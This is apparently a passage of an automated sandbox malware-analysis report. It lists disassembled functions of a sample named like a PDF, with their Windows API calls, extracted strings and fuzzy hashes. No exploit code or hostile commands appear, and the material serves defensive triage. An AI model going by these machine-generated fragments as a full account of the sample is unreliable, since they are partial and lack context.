                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00B3AD82
                                                                          • _wcscmp.LIBCMT ref: 00B3AD96
                                                                            • Part of subcall function 00B0386C: _iswctype.LIBCMT ref: 00B03874
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                          • String ID: %s%u
                                                                          • API String ID: 3744389584-679674701
                                                                          • Opcode ID: 92501f57023069872415a865677cf0978a2745672f94998c4dd1dea7d217e4c5
                                                                          • Instruction ID: ba87fbb7e6969cf24e9c3ec05d984fe506d5abcd897384d6bb8609e057401389
                                                                          • Opcode Fuzzy Hash: 92501f57023069872415a865677cf0978a2745672f94998c4dd1dea7d217e4c5
                                                                          • Instruction Fuzzy Hash: C8A1BE71204706ABDB15DF24C884FAABBE8FF04315F3086A9F9D9D2590DB30E955CB92
                                                                          Function 00B3B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00B3B3DB
                                                                          • _wcscmp.LIBCMT ref: 00B3B3EC
                                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00B3B414
                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00B3B431
                                                                          • _wcscmp.LIBCMT ref: 00B3B44F
                                                                          • _wcsstr.LIBCMT ref: 00B3B460
                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00B3B498
                                                                          • _wcscmp.LIBCMT ref: 00B3B4A8
                                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00B3B4CF
                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00B3B518
                                                                          • _wcscmp.LIBCMT ref: 00B3B528
                                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00B3B550
                                                                          • GetWindowRect.USER32(00000004,?), ref: 00B3B5B9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                          • String ID: @$ThumbnailClass
                                                                          • API String ID: 1788623398-1539354611
                                                                          • Opcode ID: 03c659731ecfce46cc23cfce2eefab4b4c866a794e13832614b97083ad8b91be
                                                                          • Instruction ID: 68e59aafb991e8821dfa8619a8bc203b20e63b8d85d8face13cb6f2b063e730d
                                                                          • Opcode Fuzzy Hash: 03c659731ecfce46cc23cfce2eefab4b4c866a794e13832614b97083ad8b91be
                                                                          • Instruction Fuzzy Hash: B781D1720083069BDB01CF10D885FBABBE8FF54314F2485A9FE898A19ADB34DD45CB61
                                                                          Function 00B3B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                          • API String ID: 1038674560-1810252412
                                                                          • Opcode ID: 74d3338586da424d01c639a1f39b4decbf15cd310a25182df6c986b691db0c60
                                                                          • Instruction ID: 02d4e5912970582b536f8bd38e054111ce04c2d2031fc0e8720cf1f700730233
                                                                          • Opcode Fuzzy Hash: 74d3338586da424d01c639a1f39b4decbf15cd310a25182df6c986b691db0c60
                                                                          • Instruction Fuzzy Hash: C631B231A04245A6DF14FAA5DE83EEE7BE8AF14B50F7001BDF511720E6EF616E04C551
                                                                          Function 00B3C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadIconW.USER32(00000063), ref: 00B3C4D4
                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B3C4E6
                                                                          • SetWindowTextW.USER32(?,?), ref: 00B3C4FD
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00B3C512
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00B3C518
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00B3C528
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00B3C52E
                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B3C54F
                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B3C569
                                                                          • GetWindowRect.USER32(?,?), ref: 00B3C572
                                                                          • SetWindowTextW.USER32(?,?), ref: 00B3C5DD
                                                                          • GetDesktopWindow.USER32 ref: 00B3C5E3
                                                                          • GetWindowRect.USER32(00000000), ref: 00B3C5EA
                                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00B3C636
                                                                          • GetClientRect.USER32(?,?), ref: 00B3C643
                                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00B3C668
                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B3C693
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                          • String ID:
                                                                          • API String ID: 3869813825-0
                                                                          • Opcode ID: 14867dab4ebcfc9f430fdb71c19f9d6c3826115bb9fd43a4fcc01704e2536ac2
                                                                          • Instruction ID: 9c9aa11256d140f66452fe329becaba77f84520b80a0dad67dc48751b3bb5e22
                                                                          • Opcode Fuzzy Hash: 14867dab4ebcfc9f430fdb71c19f9d6c3826115bb9fd43a4fcc01704e2536ac2
                                                                          • Instruction Fuzzy Hash: BD51717190070AAFDB20DFA8DD86B7EBBF5FF04705F104568E696A35A0CBB4A904CB50
                                                                          Function 00B6A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B6A4C8
                                                                          • DestroyWindow.USER32(?,?), ref: 00B6A542
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B6A5BC
                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B6A5DE
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B6A5F1
                                                                          • DestroyWindow.USER32(00000000), ref: 00B6A613
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AE0000,00000000), ref: 00B6A64A
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B6A663
                                                                          • GetDesktopWindow.USER32 ref: 00B6A67C
                                                                          • GetWindowRect.USER32(00000000), ref: 00B6A683
                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B6A69B
                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B6A6B3
                                                                            • Part of subcall function 00AE25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AE25EC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                          • String ID: 0$tooltips_class32
                                                                          • API String ID: 1297703922-3619404913
                                                                          • Opcode ID: a104e43c4c627946a5660f0977ef7a610379c813b039bf4b1f53bbf7b22fa7c7
                                                                          • Instruction ID: 69a3ca33d557904a1ab875a821d04385ca68417b06b04a796471e80a55b0525f
                                                                          • Opcode Fuzzy Hash: a104e43c4c627946a5660f0977ef7a610379c813b039bf4b1f53bbf7b22fa7c7
                                                                          • Instruction Fuzzy Hash: EB719A71140245AFDB20CF28DC49F6A7BE9FB89700F08456DF995972A0DBB8E912CF12
                                                                          Function 00B6C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                          • DragQueryPoint.SHELL32(?,?), ref: 00B6C917
                                                                            • Part of subcall function 00B6ADF1: ClientToScreen.USER32(?,?), ref: 00B6AE1A
                                                                            • Part of subcall function 00B6ADF1: GetWindowRect.USER32(?,?), ref: 00B6AE90
                                                                            • Part of subcall function 00B6ADF1: PtInRect.USER32(?,?,00B6C304), ref: 00B6AEA0
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00B6C980
                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B6C98B
                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B6C9AE
                                                                          • _wcscat.LIBCMT ref: 00B6C9DE
                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B6C9F5
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00B6CA0E
                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00B6CA25
                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00B6CA47
                                                                          • DragFinish.SHELL32(?), ref: 00B6CA4E
                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B6CB41
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                          • API String ID: 169749273-3440237614
                                                                          • Opcode ID: 0bbed2dcb85c3ebe8d7116d51199d7afc98ea5055b4c765c260e2e332b2b2947
                                                                          • Instruction ID: 8f86222eaedc501579f2d4c2aa0083c2736b73200db6206b9f2676d70f6b2f93
                                                                          • Opcode Fuzzy Hash: 0bbed2dcb85c3ebe8d7116d51199d7afc98ea5055b4c765c260e2e332b2b2947
                                                                          • Instruction Fuzzy Hash: 9E619A71108341AFC701DF64DC85DAFBBE8EF89350F000A6EF5A5932A1DB749A09CB62
                                                                          Function 00B64619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00B646AB
                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B646F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharMessageSendUpper
                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                          • API String ID: 3974292440-4258414348
                                                                          • Opcode ID: cc7939fbf4bf8448b4f7a4a1f7e5a138b5b56b0ac41a767764da31c12bcaa1be
                                                                          • Instruction ID: 751f954c144d0096cee3441800f2bb72c02ea3e158881917321f3d5e074a7199
                                                                          • Opcode Fuzzy Hash: cc7939fbf4bf8448b4f7a4a1f7e5a138b5b56b0ac41a767764da31c12bcaa1be
                                                                          • Instruction Fuzzy Hash: E7918F342047419FCB14EF21C591A6ABBE1EF95354F1448ECF8965B3A2CB34ED4ACB91
                                                                          Function 00B6BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B6BB6E
                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00B66D80,?), ref: 00B6BBCA
                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B6BC03
                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B6BC46
                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B6BC7D
                                                                          • FreeLibrary.KERNEL32(?), ref: 00B6BC89
                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B6BC99
                                                                          • DestroyIcon.USER32(?), ref: 00B6BCA8
                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B6BCC5
                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B6BCD1
                                                                            • Part of subcall function 00B0313D: __wcsicmp_l.LIBCMT ref: 00B031C6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                          • String ID: .dll$.exe$.icl
                                                                          • API String ID: 1212759294-1154884017
                                                                          • Opcode ID: 93aad7d21dcd35898aa2cf59ecb0991d4a32df7d5d2f8ea5ad7728d6a2097096
                                                                          • Instruction ID: a3f45355a94fbc4a872cfbd57e5fe4b306153fffde6a7c849ebf0e9f60b817c9
                                                                          • Opcode Fuzzy Hash: 93aad7d21dcd35898aa2cf59ecb0991d4a32df7d5d2f8ea5ad7728d6a2097096
                                                                          • Instruction Fuzzy Hash: 7A61B071900219BEEB14DF64DC85FBA7BF8FB08710F104195F915D61D1DBB89A90DBA0
                                                                          Function 00B4A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          • CharLowerBuffW.USER32(?,?), ref: 00B4A636
                                                                          • GetDriveTypeW.KERNEL32 ref: 00B4A683
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B4A6CB
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B4A702
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B4A730
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                          • API String ID: 2698844021-4113822522
                                                                          • Opcode ID: fbe9725389305ed4eafe855dfc4da43d7ec648a237fd09de3cb562d08cb6d6c1
                                                                          • Instruction ID: 818a88809957b249a698596b7c9a458c1f87015bcf82531534f1fdc55a499d1a
                                                                          • Opcode Fuzzy Hash: fbe9725389305ed4eafe855dfc4da43d7ec648a237fd09de3cb562d08cb6d6c1
                                                                          • Instruction Fuzzy Hash: BB518C711083459FC700EF25C99186AB7F8FF98758F0449ACF896572A1DB31EE0ACB92
                                                                          Function 00B4A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B4A47A
                                                                          • __swprintf.LIBCMT ref: 00B4A49C
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B4A4D9
                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B4A4FE
                                                                          • _memset.LIBCMT ref: 00B4A51D
                                                                          • _wcsncpy.LIBCMT ref: 00B4A559
                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B4A58E
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B4A599
                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00B4A5A2
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B4A5AC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                          • String ID: :$\$\??\%s
                                                                          • API String ID: 2733774712-3457252023
                                                                          • Opcode ID: 229c3055cd58c54a5984cd9ca2e9489667cacde4b3af807d6b9fba97c5debbda
                                                                          • Instruction ID: 338336a1464624ec881ac45dbb7d0edc07ba2a853f8b144fd10170aa382c1a3d
                                                                          • Opcode Fuzzy Hash: 229c3055cd58c54a5984cd9ca2e9489667cacde4b3af807d6b9fba97c5debbda
                                                                          • Instruction Fuzzy Hash: 87318FB554010AAADB219FA0DC49FAB77BCEF88701F1041F6F908D61A0EBB497448B25
                                                                          Function 00B1AB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                          • String ID:
                                                                          • API String ID: 884005220-0
                                                                          • Opcode ID: 0ee2494cff6a05e0bdf0ede04d1f3a40264c63c74e5f2577c7fac0ac3e89589c
                                                                          • Instruction ID: 9ba839d13b2a7400e39392b8746783392cc7d8132d5fc1fd19ba09db03823238
                                                                          • Opcode Fuzzy Hash: 0ee2494cff6a05e0bdf0ede04d1f3a40264c63c74e5f2577c7fac0ac3e89589c
                                                                          • Instruction Fuzzy Hash: 36611772506301AFDB205F24EC42BAA7BE9EF51721F9042E9E8019B1D1DB74EDC1C792
                                                                          Function 00B6C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B6C4EC
                                                                          • GetFocus.USER32 ref: 00B6C4FC
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00B6C507
                                                                          • _memset.LIBCMT ref: 00B6C632
                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B6C65D
                                                                          • GetMenuItemCount.USER32(?), ref: 00B6C67D
                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00B6C690
                                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B6C6C4
                                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B6C70C
                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B6C744
                                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B6C779
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                          • String ID: 0
                                                                          • API String ID: 1296962147-4108050209
                                                                          • Opcode ID: 86e23280da42a4bcf98f75bd43308d4cda9725dbe1b3b900a1799e51165bd8cf
                                                                          • Instruction ID: 57eaecab4337dca3b08af0d58fb0ae31f99d792c1942269012a548ecd407b430
                                                                          • Opcode Fuzzy Hash: 86e23280da42a4bcf98f75bd43308d4cda9725dbe1b3b900a1799e51165bd8cf
                                                                          • Instruction Fuzzy Hash: A0818D712083019FD710CF24D985A7BBBE8FB98314F1045AEF99697291DB78DD05CBA2
                                                                          Function 00B383F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B3874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B38766
                                                                            • Part of subcall function 00B3874A: GetLastError.KERNEL32(?,00B3822A,?,?,?), ref: 00B38770
